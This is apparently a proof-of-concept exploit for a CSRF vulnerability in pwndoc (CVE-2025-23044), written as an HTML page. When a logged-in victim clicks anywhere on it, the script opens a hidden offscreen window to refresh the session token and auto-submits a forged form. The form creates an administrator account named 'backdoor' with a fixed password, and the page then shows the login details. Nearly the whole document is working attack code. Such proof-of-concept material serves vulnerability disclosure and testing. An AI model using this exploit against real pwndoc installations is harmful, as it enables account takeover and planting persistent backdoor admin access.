PoC for pwndoc CSRF vulnerability (CVE-2025-23044)

pwndoc-csrf.html

<p>Click/press anywhere to trigger the exploit</p>
<script>
  const HOST = "https://localhost:8443";

  const loop = setInterval(() => {
    if (navigator.userActivation.isActive) {
      // Only allowed when user is active, avoid popup blocker
      let w = window.open(`${HOST}/api/users/refreshtoken`, "", "width=1,height=1,left=9999,top=9999");
      if (w) {
        clearInterval(loop);
        document.body.innerHTML = "<h1>Exploiting...</h1><p>Refreshing token</p>";

        // After cookie is reset, submit the POST form
        setTimeout(() => {
          const username = "backdoor" + Math.floor(Math.random() * 100000);

          const blob = new Blob(
            [
              `
              <form action="${HOST}/api/users" method="post">
                <input type="hidden" name="username" value="${username}" />
                <input type="hidden" name="role" value="admin" />
                <input type="hidden" name="password" value="Backdoor123" />
                <input type="hidden" name="firstname" value="Back" />
                <input type="hidden" name="lastname" value="Door" />
              </form>
              <script>
                document.forms[0].submit();
              <\/script>
            `,
            ],
            { type: "text/html" }
          );
          w.location = URL.createObjectURL(blob);
          document.body.innerHTML = "<h1>Exploiting...</h1><p>Adding administrator</p>";

          setTimeout(() => {
            // Close window to clean up
            w.close();

            document.body.innerHTML = `<h1>Exploit completed!</h1>
            <p>Log in at: <a href="${HOST}/login" target="_blank">${HOST}/login</a></p>
            <ul>
              <li>Username: <code>${username}</code></li>
              <li>Password: <code>Backdoor123</code></li>
            </ul>
            `;
          }, 1000);
        }, 1000);
      }
    }
  }, 100);
</script>